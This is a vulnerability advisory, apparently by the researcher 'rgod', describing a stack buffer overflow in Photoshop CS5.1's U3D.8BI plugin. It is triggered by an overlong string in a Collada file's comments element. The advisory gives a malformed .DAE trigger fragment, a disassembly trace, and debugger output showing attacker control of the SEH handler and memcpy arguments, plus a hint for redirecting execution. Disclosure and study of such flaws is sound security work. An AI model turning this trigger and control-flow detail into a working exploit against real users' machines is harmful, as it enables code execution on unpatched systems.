Adobe Photoshop CS5.1 U3D.8BI Library Collada Asset Elements Stack Based Buffer Overflow Vulnerability download url of a test version: http://www.adobe.com/cfusion/tdrc/index.cfm?product=photoshop Note: Found three weeks before the CS6 release. I could not reproduce against CS6, cannot say if there is a CVE for this, I think is also possible they patched silently. However this leaves a lot of Photoshop installations vulnerable. vulnerability: A buffer overflow exists in the way Photoshop parses Collada (*.DAE) asset elements, example file: ... <?xml version="1.0"?> <COLLADA xmlns="http://www.collada.org/2005/11/COLLADASchema" version="1.4.1"> <asset> <contributor> <author>rgod</author> <authoring_tool>Maya 8.0 | ColladaMaya v3.02 | FCollada v3.2</authoring_tool> <comments>Collada Maya Export Options: bakeTransforms=0;exportPolygonMeshes=1;bakeLighting=0;isSampling=0; curveConstrainSampling=0;exportCameraAsLookat=0; exportLights=1;exportCameras=1;exportJointsAndSkin=1; exportAnimations=1;exportTriangles=1;exportInvisibleNodes=0; exportNormals=1;exportTexCoords=1;exportVertexColors=1;exportTangents=0; exportTexTangents=0;exportConstraints=1;exportPhysics=0;exportXRefs=1; dereferenceXRefs=0;cameraXFov=0;cameraYFov=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... </comments> ... While trying to convert the element field from ASCII to Unicode the U3D.B8I library plugin does a miscalculation in allocating a buffer for the user-supplied string then overwrite the stack with the user-controlled buffer. Critical structures are overwritten (SEH), also the arguments of a subsequent memcpy() are used-controlled. vulnerable code, theese routines u3d.8bi (this is repeated one time for each byte of the string), run trace: ... 10A05C30 55 push ebp 10A05C31 8BEC mov ebp, esp 10A05C33 83EC 10 sub esp, 10 10A05C36 8B45 08 mov eax, dword ptr ss:[ebp+8] 10A05C39 0345 0C add eax, dword ptr ss:[ebp+C] 10A05C3C 8945 F8 mov dword ptr ss:[ebp-8], eax 10A05C3F 8B4D 0C mov ecx, dword ptr ss:[ebp+C] 10A05C42 894D F4 mov dword ptr ss:[ebp-C], ecx 10A05C45 8B55 F4 mov edx, dword ptr ss:[ebp-C] 10A05C48 83EA 01 sub edx, 1 10A05C4B 8955 F4 mov dword ptr ss:[ebp-C], edx 10A05C4E 837D F4 03 cmp dword ptr ss:[ebp-C], 3 10A05C52 77 0A ja short U3D.10A05C5E 10A05C54 8B45 F4 mov eax, dword ptr ss:[ebp-C] 10A05C57 FF2485 A45DA010 jmp dword ptr ds:[eax*4+10A05DA4] ... ... 10A05D6A 8B4D 08 mov ecx, dword ptr ss:[ebp+8] 10A05D6D 0FB611 movzx edx, byte ptr ds:[ecx] 10A05D70 81FA 80000000 cmp edx, 80 10A05D76 7C 12 jl short U3D.10A05D8A 10A05D78 8B45 08 mov eax, dword ptr ss:[ebp+8] 10A05D7B 0FB608 movzx ecx, byte ptr ds:[eax] 10A05D7E 81F9 C2000000 cmp ecx, 0C2 10A05D84 7D 04 jge short U3D.10A05D8A 10A05D86 32C0 xor al, al 10A05D88 EB 13 jmp short U3D.10A05D9D 10A05D8A 8B55 08 mov edx, dword ptr ss:[ebp+8] 10A05D8D 0FB602 movzx eax, byte ptr ds:[edx] 10A05D90 3D F4000000 cmp eax, 0F4 10A05D95 7E 04 jle short U3D.10A05D9B 10A05D97 32C0 xor al, al 10A05D99 EB 02 jmp short U3D.10A05D9D 10A05D9B B0 01 mov al, 1 10A05D9D 8BE5 mov esp, ebp 10A05D9F 5D pop ebp 10A05DA0 C3 retn ... ... 10A05E4B 83C4 08 add esp, 8 10A05E4E 0FB6D0 movzx edx, al 10A05E51 85D2 test edx, edx 10A05E53 75 0C jnz short U3D.10A05E61 10A05E55 C745 F8 03000000 mov dword ptr ss:[ebp-8], 3 10A05E5C E9 15020000 jmp U3D.10A06076 10A05E61 0FB745 F0 movzx eax, word ptr ss:[ebp-10] 10A05E65 8945 E8 mov dword ptr ss:[ebp-18], eax 10A05E68 837D E8 05 cmp dword ptr ss:[ebp-18], 5 10A05E6C 0F87 B5000000 ja U3D.10A05F27 10A05E72 8B4D E8 mov ecx, dword ptr ss:[ebp-18] 10A05E75 FF248D 9060A010 jmp dword ptr ds:[ecx*4+10A06090] ... ... 10A05F12 8B4D F4 mov ecx, dword ptr ss:[ebp-C] 10A05F15 0FB611 movzx edx, byte ptr ds:[ecx] 10A05F18 0355 EC add edx, dword ptr ss:[ebp-14] 10A05F1B 8955 EC mov dword ptr ss:[ebp-14], edx 10A05F1E 8B45 F4 mov eax, dword ptr ss:[ebp-C] 10A05F21 83C0 01 add eax, 1 10A05F24 8945 F4 mov dword ptr ss:[ebp-C], eax 10A05F27 0FB74D F0 movzx ecx, word ptr ss:[ebp-10] 10A05F2B 8B55 EC mov edx, dword ptr ss:[ebp-14] 10A05F2E 2B148D 5034B110 sub edx, dword ptr ds:[ecx*4+10B1345> 10A05F35 8955 EC mov dword ptr ss:[ebp-14], edx 10A05F38 8B45 FC mov eax, dword ptr ss:[ebp-4] 10A05F3B 3B45 14 cmp eax, dword ptr ss:[ebp+14] 10A05F3E 72 1B jb short U3D.10A05F5B 10A05F40 0FB74D F0 movzx ecx, word ptr ss:[ebp-10] 10A05F44 83C1 01 add ecx, 1 10A05F47 8B55 F4 mov edx, dword ptr ss:[ebp-C] 10A05F4A 2BD1 sub edx, ecx 10A05F4C 8955 F4 mov dword ptr ss:[ebp-C], edx 10A05F4F C745 F8 02000000 mov dword ptr ss:[ebp-8], 2 10A05F56 E9 1B010000 jmp U3D.10A06076 10A05F5B 817D EC FFFF0000 cmp dword ptr ss:[ebp-14], 0FFFF 10A05F62 77 63 ja short U3D.10A05FC7 10A05F64 817D EC 00D80000 cmp dword ptr ss:[ebp-14], 0D800 10A05F6B 72 42 jb short U3D.10A05FAF ... ... 10A05FAF 8B55 FC mov edx, dword ptr ss:[ebp-4] 10A05FB2 66:8B45 EC mov ax, word ptr ss:[ebp-14] 10A05FB6 66:8902 mov word ptr ds:[edx], ax <------------- boom 10A05FB9 8B4D FC mov ecx, dword ptr ss:[ebp-4] 10A05FBC 83C1 02 add ecx, 2 10A05FBF 894D FC mov dword ptr ss:[ebp-4], ecx 10A05FC2 E9 AA000000 jmp U3D.10A06071 ... ... 10A06071 ^E9 87FDFFFF jmp U3D.10A05DFD ... ... 10A05DFD 8B4D F4 mov ecx, dword ptr ss:[ebp-C] 10A05E00 3B4D 0C cmp ecx, dword ptr ss:[ebp+C] 10A05E03 0F83 6D020000 jnb U3D.10A06076 10A05E09 C745 EC 00000000 mov dword ptr ss:[ebp-14], 0 10A05E10 8B55 F4 mov edx, dword ptr ss:[ebp-C] 10A05E13 0FB602 movzx eax, byte ptr ds:[edx] 10A05E16 66:0FBE88 5033B1>movsx cx, byte ptr ds:[eax+10B13350] 10A05E1E 66:894D F0 mov word ptr ss:[ebp-10], cx 10A05E22 0FB755 F0 movzx edx, word ptr ss:[ebp-10] 10A05E26 0355 F4 add edx, dword ptr ss:[ebp-C] 10A05E29 3B55 0C cmp edx, dword ptr ss:[ebp+C] 10A05E2C 72 0C jb short U3D.10A05E3A 10A05E2E C745 F8 01000000 mov dword ptr ss:[ebp-8], 1 10A05E35 E9 3C020000 jmp U3D.10A06076 10A05E3A 0FB745 F0 movzx eax, word ptr ss:[ebp-10] 10A05E3E 83C0 01 add eax, 1 10A05E41 50 push eax 10A05E42 8B4D F4 mov ecx, dword ptr ss:[ebp-C] 10A05E45 51 push ecx 10A05E46 E8 E5FDFFFF call U3D.10A05C30 ... Results: SEH chain of main thread Address SE handler 001184B8 Photosho.00410041 <------------------- 00410062 <--- E8CE8B57 After the stack is overwritten a memcpy() is called: Call stack of main thread Address Stack Procedure / arguments Called from Frame 00117454 10BB3EB1 <jmp.&MSVCR90.memcpy> U3D.10BB3EAC 00117494 00117458 11720020 dest = 11720020 0011745C 006E006E src = Photosho.006E006E <----------- 00117460 00C200C2 n = C200C2 (12714178.) <----------- 00117498 10BA64C0 U3D.10BB3E40 U3D.10BA64BB 00117494 Error occurs then exception is thrown EIP -> 00410041 eip is unicode expanded, but it is possible to return inside an ASCII user controlled memory region by setting the SE handler to Photoshop.00630041. As attachment, proof of concept code. Additional note: 0:000> lm -vm U3D start end module name 10630000 107eb000 U3D (export symbols) C:\Program Files\adobe\Adobe Photoshop CS5.1\Plug-ins\File Formats\U3D.8BI Loaded symbol image file: C:\Program Files\adobe\Adobe Photoshop CS5.1\Plug-ins\File Formats\U3D.8BI Image path: C:\Program Files\adobe\Adobe Photoshop CS5.1\Plug-ins\File Formats\U3D.8BI Image name: U3D.8BI Timestamp: Mon Mar 28 20:23:29 2011 (4D90D221) CheckSum: 001BB7D7 ImageSize: 001BB000 File version: 12.1.0.0 Product version: 12.1.0.0 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type: 2.0 Dll File date: 00000000.00000000 Translations: 0409.04b0 CompanyName: Adobe Systems, Incorporated ProductName: Adobe Photoshop CS5.1 InternalName: U3D OriginalFilename: U3D8B.8BI ProductVersion: CS5.1 FileVersion: 12.1 (12.1x20110328 [20110328.r.145 2011/03/28:10:30:00 cutoff; r branch]) FileDescription: Adobe Photoshop CS5.1 LegalCopyright: Copyright 2011 Adobe Systems Inc. //rgod